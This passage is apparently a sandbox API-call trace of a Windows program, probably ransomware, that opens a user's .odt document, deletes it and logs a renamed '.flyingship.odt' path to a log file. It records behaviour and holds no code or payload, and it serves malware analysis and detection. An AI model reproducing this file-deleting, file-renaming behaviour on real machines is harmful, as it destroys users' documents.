lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.228] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.228] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0173.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0173.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.229] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.229] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.229] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.229] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.229] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.229] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.230] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0173.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bda08 [0173.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bda08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0173.232] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.232] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.232] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0173.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.233] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.233] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.233] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.233] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFilePart=0x0) returned 0x4b [0173.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0xc9d2ca0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0x90af58 [0173.235] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.odt")) returned 1 [0173.237] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0xc9d2ca0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0 [0173.237] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.237] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.238] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.238] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.239] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.239] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.240] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.240] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.240] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.240] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.241] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.241] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x1222, lpOverlapped=0x0) returned 1 [0173.241] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.241] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1222, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.241] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0173.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x59) returned 0x9a5d10 [0173.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\n", cchWideChar=89, lpMultiByteStr=0x9a5d10, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 89 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0173.241] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x58, lpOverlapped=0x0) returned 1 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.241] CloseHandle (hObject=0x120) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.244] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.244] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, 